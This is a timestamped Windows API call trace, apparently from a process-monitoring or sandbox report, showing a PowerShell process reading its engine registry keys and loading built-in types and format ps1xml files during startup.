	[0693.197] ReadFile (in: hFile=0x318, lpBuffer=0x2e108d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed328, lpOverlapped=0x0 | out: lpBuffer=0x2e108d8*, lpNumberOfBytesRead=0xed328*=0xcf3, lpOverlapped=0x0) returned 1
	[0693.197] ReadFile (in: hFile=0x318, lpBuffer=0x2e0fd33, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0xed328, lpOverlapped=0x0 | out: lpBuffer=0x2e0fd33*, lpNumberOfBytesRead=0xed328*=0x0, lpOverlapped=0x0) returned 1
	[0693.197] ReadFile (in: hFile=0x318, lpBuffer=0x2e108d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed328, lpOverlapped=0x0 | out: lpBuffer=0x2e108d8*, lpNumberOfBytesRead=0xed328*=0x0, lpOverlapped=0x0) returned 1
	[0693.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xed040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0693.200] SetErrorMode (uMode=0x1) returned 0x1
	[0693.200] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xed2a0 | out: lpFileInformation=0xed2a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0693.200] SetErrorMode (uMode=0x1) returned 0x1
	[0693.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xecfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0693.201] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xed388 | out: phkResult=0xed388*=0x318) returned 0x0
	[0693.201] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed30c, lpData=0x0, lpcbData=0xed308*=0x0 | out: lpType=0xed30c*=0x1, lpData=0x0, lpcbData=0xed308*=0x56) returned 0x0
	[0693.201] CoTaskMemAlloc (cb=0x5a) returned 0x1b976890
	[0693.201] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed2dc, lpData=0x1b976890, lpcbData=0xed2d8*=0x56 | out: lpType=0xed2dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xed2d8*=0x56) returned 0x0
	[0693.202] CoTaskMemFree (pv=0x1b976890) 
	[0693.202] RegCloseKey (hKey=0x318) returned 0x0
	[0693.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xecfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0693.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xece80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0699.083] VirtualQuery (in: lpAddress=0xec070, lpBuffer=0xecf30, dwLength=0x30 | out: lpBuffer=0xecf30*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0701.717] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2e4
	[0701.717] GetFileType (hFile=0x2e4) returned 0x1
	[0701.717] SetErrorMode (uMode=0x1) returned 0x1
	[0701.717] GetFileType (hFile=0x2e4) returned 0x1
	[0701.718] ReadFile (in: hFile=0x2e4, lpBuffer=0x2dc2450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed328, lpOverlapped=0x0 | out: lpBuffer=0x2dc2450*, lpNumberOfBytesRead=0xed328*=0x1000, lpOverlapped=0x0) returned 1
	[0701.718] ReadFile (in: hFile=0x2e4, lpBuffer=0x2dc2450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed328, lpOverlapped=0x0 | out: lpBuffer=0x2dc2450*, lpNumberOfBytesRead=0xed328*=0x1000, lpOverlapped=0x0) returned 1
	[0701.719] ReadFile (in: hFile=0x2e4, lpBuffer=0x2dc2450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed328, lpOverlapped=0x0 | out: lpBuffer=0x2dc2450*, lpNumberOfBytesRead=0xed328*=0x1000, lpOverlapped=0x0) returned 1
	[0701.719] ReadFile (in: hFile=0x2e4, lpBuffer=0x2dc2450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed328, lpOverlapped=0x0 | out: lpBuffer=0x2dc2450*, lpNumberOfBytesRead=0xed328*=0x1000, lpOverlapped=0x0) returned 1
	[0701.719] ReadFile (in: hFile=0x2e4, lpBuffer=0x2dc2450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed328, lpOverlapped=0x0 | out: lpBuffer=0x2dc2450*, lpNumberOfBytesRead=0xed328*=0x1000, lpOverlapped=0x0) returned 1
	[0701.719] ReadFile (in: hFile=0x2e4, lpBuffer=0x2dc2450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed328, lpOverlapped=0x0 | out: lpBuffer=0x2dc2450*, lpNumberOfBytesRead=0xed328*=0x1000, lpOverlapped=0x0) returned 1
	[0701.719] ReadFile (in: hFile=0x2e4, lpBuffer=0x2dc2450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed328, lpOverlapped=0x0 | out: lpBuffer=0x2dc2450*, lpNumberOfBytesRead=0xed328*=0x1000, lpOverlapped=0x0) returned 1
	[0701.720] ReadFile (in: hFile=0x2e4, lpBuffer=0x2dc2450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed328, lpOverlapped=0x0 | out: lpBuffer=0x2dc2450*, lpNumberOfBytesRead=0xed328*=0x1000, lpOverlapped=0x0) returned 1
	[0701.720] ReadFile (in: hFile=0x2e4, lpBuffer=0x2dc2450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed328, lpOverlapped=0x0 | out: lpBuffer=0x2dc2450*, lpNumberOfBytesRead=0xed328*=0x1000, lpOverlapped=0x0) returned 1
	[0701.721] ReadFile (in: hFile=0x2e4, lpBuffer=0x2dc2450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed328, lpOverlapped=0x0 | out: lpBuffer=0x2dc2450*, lpNumberOfBytesRead=0xed328*=0x1000, lpOverlapped=0x0) returned 1
	[0701.722] ReadFile (in: hFile=0x2e4, lpBuffer=0x2dc2450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed328, lpOverlapped=0x0 | out: lpBuffer=0x2dc2450*, lpNumberOfBytesRead=0xed328*=0x1000, lpOverlapped=0x0) returned 1
	[0701.724] ReadFile (in: hFile=0x2e4, lpBuffer=0x2dc2450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed328, lpOverlapped=0x0 | out: lpBuffer=0x2dc2450*, lpNumberOfBytesRead=0xed328*=0x1000, lpOverlapped=0x0) returned 1
	[0701.724] ReadFile (in: hFile=0x2e4, lpBuffer=0x2dc2450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed328, lpOverlapped=0x0 | out: lpBuffer=0x2dc2450*, lpNumberOfBytesRead=0xed328*=0x1000, lpOverlapped=0x0) returned 1
	[0701.724] ReadFile (in: hFile=0x2e4, lpBuffer=0x2dc2450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed328, lpOverlapped=0x0 | out: lpBuffer=0x2dc2450*, lpNumberOfBytesRead=0xed328*=0x1000, lpOverlapped=0x0) returned 1
	[0701.725] ReadFile (in: hFile=0x2e4, lpBuffer=0x2dc2450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed328, lpOverlapped=0x0 | out: lpBuffer=0x2dc2450*, lpNumberOfBytesRead=0xed328*=0x1000, lpOverlapped=0x0) returned 1
	[0701.749] ReadFile (in: hFile=0x2e4, lpBuffer=0x2dc2450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed328, lpOverlapped=0x0 | out: lpBuffer=0x2dc2450*, lpNumberOfBytesRead=0xed328*=0x1000, lpOverlapped=0x0) returned 1
	[0701.749] ReadFile (in: hFile=0x2e4, lpBuffer=0x2dc2450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed328, lpOverlapped=0x0 | out: lpBuffer=0x2dc2450*, lpNumberOfBytesRead=0xed328*=0x1000, lpOverlapped=0x0) returned 1
	[0701.752] ReadFile (in: hFile=0x2e4, lpBuffer=0x2dc2450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed328, lpOverlapped=0x0 | out: lpBuffer=0x2dc2450*, lpNumberOfBytesRead=0xed328*=0x1000, lpOverlapped=0x0) returned 1
	[0701.752] ReadFile (in: hFile=0x2e4, lpBuffer=0x2dc2450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed328, lpOverlapped=0x0 | out: lpBuffer=0x2dc2450*, lpNumberOfBytesRead=0xed328*=0x1000, lpOverlapped=0x0) returned 1
	[0701.753] ReadFile (in: hFile=0x2e4, lpBuffer=0x2dc2450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed328, lpOverlapped=0x0 | out: lpBuffer=0x2dc2450*, lpNumberOfBytesRead=0xed328*=0x1000, lpOverlapped=0x0) returned 1
	[0701.753] ReadFile (in: hFile=0x2e4, lpBuffer=0x2dc2450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed328, lpOverlapped=0x0 | out: lpBuffer=0x2dc2450*, lpNumberOfBytesRead=0xed328*=0x1000, lpOverlapped=0x0) returned 1
	[0701.753] ReadFile (in: hFile=0x2e4, lpBuffer=0x2dc2450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed328, lpOverlapped=0x0 | out: lpBuffer=0x2dc2450*, lpNumberOfBytesRead=0xed328*=0x1000, lpOverlapped=0x0) returned 1
	[0701.754] ReadFile (in: hFile=0x2e4, lpBuffer=0x2dc2450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed328, lpOverlapped=0x0 | out: lpBuffer=0x2dc2450*, lpNumberOfBytesRead=0xed328*=0x1000, lpOverlapped=0x0) returned 1
	[0701.754] ReadFile (in: hFile=0x2e4, lpBuffer=0x2dc2450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed328, lpOverlapped=0x0 | out: lpBuffer=0x2dc2450*, lpNumberOfBytesRead=0xed328*=0x1000, lpOverlapped=0x0) returned 1
	[0701.755] ReadFile (in: hFile=0x2e4, lpBuffer=0x2dc2450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed328, lpOverlapped=0x0 | out: lpBuffer=0x2dc2450*, lpNumberOfBytesRead=0xed328*=0x1000, lpOverlapped=0x0) returned 1
	[0701.755] ReadFile (in: hFile=0x2e4, lpBuffer=0x2dc2450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed328, lpOverlapped=0x0 | out: lpBuffer=0x2dc2450*, lpNumberOfBytesRead=0xed328*=0x1000, lpOverlapped=0x0) returned 1
	[0701.755] ReadFile (in: hFile=0x2e4, lpBuffer=0x2dc2450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed328, lpOverlapped=0x0 | out: lpBuffer=0x2dc2450*, lpNumberOfBytesRead=0xed328*=0x1000, lpOverlapped=0x0) returned 1
	[0701.756] ReadFile (in: hFile=0x2e4, lpBuffer=0x2dc2450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed328, lpOverlapped=0x0 | out: lpBuffer=0x2dc2450*, lpNumberOfBytesRead=0xed328*=0x1000, lpOverlapped=0x0) returned 1
	[0701.756] ReadFile (in: hFile=0x2e4, lpBuffer=0x2dc2450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed328, lpOverlapped=0x0 | out: lpBuffer=0x2dc2450*, lpNumberOfBytesRead=0xed328*=0x1000, lpOverlapped=0x0) returned 1
	[0701.756] ReadFile (in: hFile=0x2e4, lpBuffer=0x2dc2450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed328, lpOverlapped=0x0 | out: lpBuffer=0x2dc2450*, lpNumberOfBytesRead=0xed328*=0x1000, lpOverlapped=0x0) returned 1
	[0701.757] ReadFile (in: hFile=0x2e4, lpBuffer=0x2dc2450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed328, lpOverlapped=0x0 | out: lpBuffer=0x2dc2450*, lpNumberOfBytesRead=0xed328*=0x1000, lpOverlapped=0x0) returned 1
	[0701.757] ReadFile (in: hFile=0x2e4, lpBuffer=0x2dc2450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed328, lpOverlapped=0x0 | out: lpBuffer=0x2dc2450*, lpNumberOfBytesRead=0xed328*=0x1000, lpOverlapped=0x0) returned 1
	[0701.757] ReadFile (in: hFile=0x2e4, lpBuffer=0x2dc2450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed328, lpOverlapped=0x0 | out: lpBuffer=0x2dc2450*, lpNumberOfBytesRead=0xed328*=0x1000, lpOverlapped=0x0) returned 1
	[0701.762] ReadFile (in: hFile=0x2e4, lpBuffer=0x2dc2450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed328, lpOverlapped=0x0 | out: lpBuffer=0x2dc2450*, lpNumberOfBytesRead=0xed328*=0x1000, lpOverlapped=0x0) returned 1
	[0701.762] ReadFile (in: hFile=0x2e4, lpBuffer=0x2dc2450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed328, lpOverlapped=0x0 | out: lpBuffer=0x2dc2450*, lpNumberOfBytesRead=0xed328*=0x1000, lpOverlapped=0x0) returned 1
	[0701.762] ReadFile (in: hFile=0x2e4, lpBuffer=0x2dc2450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed328, lpOverlapped=0x0 | out: lpBuffer=0x2dc2450*, lpNumberOfBytesRead=0xed328*=0x1000, lpOverlapped=0x0) returned 1
	[0701.763] ReadFile (in: hFile=0x2e4, lpBuffer=0x2dc2450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed328, lpOverlapped=0x0 | out: lpBuffer=0x2dc2450*, lpNumberOfBytesRead=0xed328*=0x1000, lpOverlapped=0x0) returned 1
	[0701.763] ReadFile (in: hFile=0x2e4, lpBuffer=0x2dc2450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed328, lpOverlapped=0x0 | out: lpBuffer=0x2dc2450*, lpNumberOfBytesRead=0xed328*=0x1000, lpOverlapped=0x0) returned 1
	[0701.763] ReadFile (in: hFile=0x2e4, lpBuffer=0x2dc2450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed328, lpOverlapped=0x0 | out: lpBuffer=0x2dc2450*, lpNumberOfBytesRead=0xed328*=0x1000, lpOverlapped=0x0) returned 1
	[0701.764] ReadFile (in: hFile=0x2e4, lpBuffer=0x2dc2450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed328, lpOverlapped=0x0 | out: lpBuffer=0x2dc2450*, lpNumberOfBytesRead=0xed328*=0x1000, lpOverlapped=0x0) returned 1
	[0701.764] ReadFile (in: hFile=0x2e4, lpBuffer=0x2dc2450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed328, lpOverlapped=0x0 | out: lpBuffer=0x2dc2450*, lpNumberOfBytesRead=0xed328*=0x1000, lpOverlapped=0x0) returned 1
	[0701.764] ReadFile (in: hFile=0x2e4, lpBuffer=0x2dc2450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed328, lpOverlapped=0x0 | out: lpBuffer=0x2dc2450*, lpNumberOfBytesRead=0xed328*=0x1b4, lpOverlapped=0x0) returned 1
	[0701.764] ReadFile (in: hFile=0x2e4, lpBuffer=0x2dc2450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed328, lpOverlapped=0x0 | out: lpBuffer=0x2dc2450*, lpNumberOfBytesRead=0xed328*=0x0, lpOverlapped=0x0) returned 1
	[0701.765] CloseHandle (hObject=0x2e4) returned 1
	[0701.765] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xed040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0701.765] SetErrorMode (uMode=0x1) returned 0x1
	[0701.765] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xed2a0 | out: lpFileInformation=0xed2a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0701.765] SetErrorMode (uMode=0x1) returned 0x1
	[0701.765] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xecfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0701.765] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xed388 | out: phkResult=0xed388*=0x2e4) returned 0x0
	[0701.766] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed30c, lpData=0x0, lpcbData=0xed308*=0x0 | out: lpType=0xed30c*=0x1, lpData=0x0, lpcbData=0xed308*=0x56) returned 0x0
	[0701.766] CoTaskMemAlloc (cb=0x5a) returned 0x1b976890
	[0701.766] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed2dc, lpData=0x1b976890, lpcbData=0xed2d8*=0x56 | out: lpType=0xed2dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xed2d8*=0x56) returned 0x0
	[0701.766] CoTaskMemFree (pv=0x1b976890) 
	[0701.766] RegCloseKey (hKey=0x2e4) returned 0x0
	[0701.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xecfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0701.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xece80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0716.512] CoTaskMemAlloc (cb=0x104) returned 0x243180
	[0716.512] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x243180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0716.512] CoTaskMemFree (pv=0x243180) 
	[0718.609] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed528 | out: phkResult=0xed528*=0x2e4) returned 0x0
	[0718.609] RegQueryValueExW (in: hKey=0x2e4, lpValueName="path", lpReserved=0x0, lpType=0xed53c, lpData=0x0, lpcbData=0xed538*=0x0 | out: lpType=0xed53c*=0x1, lpData=0x0, lpcbData=0xed538*=0x74) returned 0x0
	[0718.609] RegQueryValueExW (in: hKey=0x2e4, lpValueName="path", lpReserved=0x0, lpType=0xed4ac, lpData=0x0, lpcbData=0xed4a8*=0x0 | out: lpType=0xed4ac*=0x1, lpData=0x0, lpcbData=0xed4a8*=0x74) returned 0x0
	[0718.609] CoTaskMemAlloc (cb=0x78) returned 0x1f0560
	[0718.609] RegQueryValueExW (in: hKey=0x2e4, lpValueName="path", lpReserved=0x0, lpType=0xed47c, lpData=0x1f0560, lpcbData=0xed478*=0x74 | out: lpType=0xed47c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0xed478*=0x74) returned 0x0
	[0718.609] CoTaskMemFree (pv=0x1f0560) 
	[0718.609] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0xed1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0718.609] SetErrorMode (uMode=0x1) returned 0x1
	[0718.610] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xed400 | out: lpFileInformation=0xed400*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0718.610] SetErrorMode (uMode=0x1) returned 0x1
	[0718.611] CoTaskMemAlloc (cb=0x104) returned 0x243180
	[0718.611] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x243180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0718.611] CoTaskMemFree (pv=0x243180) 
	[0718.624] CoTaskMemAlloc (cb=0x104) returned 0x243180
	[0718.624] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x243180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0718.624] CoTaskMemFree (pv=0x243180) 
	[0718.626] CoTaskMemAlloc (cb=0x104) returned 0x243180
	[0718.626] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x243180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0718.626] CoTaskMemFree (pv=0x243180) 
	[0718.627] CoTaskMemAlloc (cb=0x104) returned 0x243180
	[0718.627] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x243180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0718.628] CoTaskMemFree (pv=0x243180) 
	[0718.628] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xecb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0718.629] SetErrorMode (uMode=0x1) returned 0x1
	[0718.629] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314
	[0718.629] GetFileType (hFile=0x314) returned 0x1
	[0718.629] SetErrorMode (uMode=0x1) returned 0x1
	[0718.629] GetFileType (hFile=0x314) returned 0x1
	[0718.629] ReadFile (in: hFile=0x314, lpBuffer=0x346a488, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x346a488*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0718.631] ReadFile (in: hFile=0x314, lpBuffer=0x346a488, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x346a488*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0720.379] ReadFile (in: hFile=0x314, lpBuffer=0x346a488, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x346a488*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0720.379] ReadFile (in: hFile=0x314, lpBuffer=0x346a488, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x346a488*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0720.380] ReadFile (in: hFile=0x314, lpBuffer=0x346a488, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x346a488*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0720.380] ReadFile (in: hFile=0x314, lpBuffer=0x346a488, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x346a488*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0720.380] ReadFile (in: hFile=0x314, lpBuffer=0x346a488, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x346a488*, lpNumberOfBytesRead=0xed098*=0x9e2, lpOverlapped=0x0) returned 1
	[0720.380] ReadFile (in: hFile=0x314, lpBuffer=0x34699d2, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x34699d2*, lpNumberOfBytesRead=0xed098*=0x0, lpOverlapped=0x0) returned 1
	[0720.380] ReadFile (in: hFile=0x314, lpBuffer=0x346a488, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x346a488*, lpNumberOfBytesRead=0xed098*=0x0, lpOverlapped=0x0) returned 1
	[0720.381] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xed128 | out: phkResult=0xed128*=0x314) returned 0x0
	[0720.381] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed0ac, lpData=0x0, lpcbData=0xed0a8*=0x0 | out: lpType=0xed0ac*=0x1, lpData=0x0, lpcbData=0xed0a8*=0x56) returned 0x0
	[0720.381] CoTaskMemAlloc (cb=0x5a) returned 0x1b976d60
	[0720.381] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed07c, lpData=0x1b976d60, lpcbData=0xed078*=0x56 | out: lpType=0xed07c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xed078*=0x56) returned 0x0
	[0720.381] CoTaskMemFree (pv=0x1b976d60) 
	[0720.381] RegCloseKey (hKey=0x314) returned 0x0
	[0720.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xecd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
